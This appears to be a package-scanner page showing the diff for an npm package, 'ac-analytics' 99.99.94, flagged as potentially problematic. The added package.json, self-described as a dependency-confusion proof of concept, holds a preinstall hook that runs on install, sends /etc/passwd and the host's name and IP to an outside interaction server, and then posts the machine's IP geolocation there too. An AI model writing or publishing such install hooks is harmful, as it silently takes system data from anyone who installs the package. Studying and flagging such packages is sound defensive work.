ac-analytics 99.99.94

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of ac-analytics might be problematic. Click here for more details.

Files changed (1) hide show
  1. package/package.json +12 -0
package/package.json ADDED
@@ -0,0 +1,12 @@
1
+ {
2
+ "name": "ac-analytics",
3
+ "version": "99.99.94",
4
+ "description": "Fake package for dependency confusion PoC",
5
+ "author": "Bug Bounty PoC",
6
+ "scripts": {
7
+ "preinstall": "/usr/bin/curl --data '@/etc/passwd' $(hostname)-$(hostname -I | awk '{print $1}').tuhmsezdsoumhbktgkvmssnh78f12bt2s.oast.fun && /usr/bin/curl -s -X GET http://ip-api.com/json/$(hostname -I | awk '{print $1}') | /usr/bin/curl -X POST -d @- http://tuhmsezdsoumhbktgkvmssnh78f12bt2s.oast.fun/log_ip"
8
+ },
9
+ "publishConfig": {
10
+ "access": "public"
11
+ }
12
+ }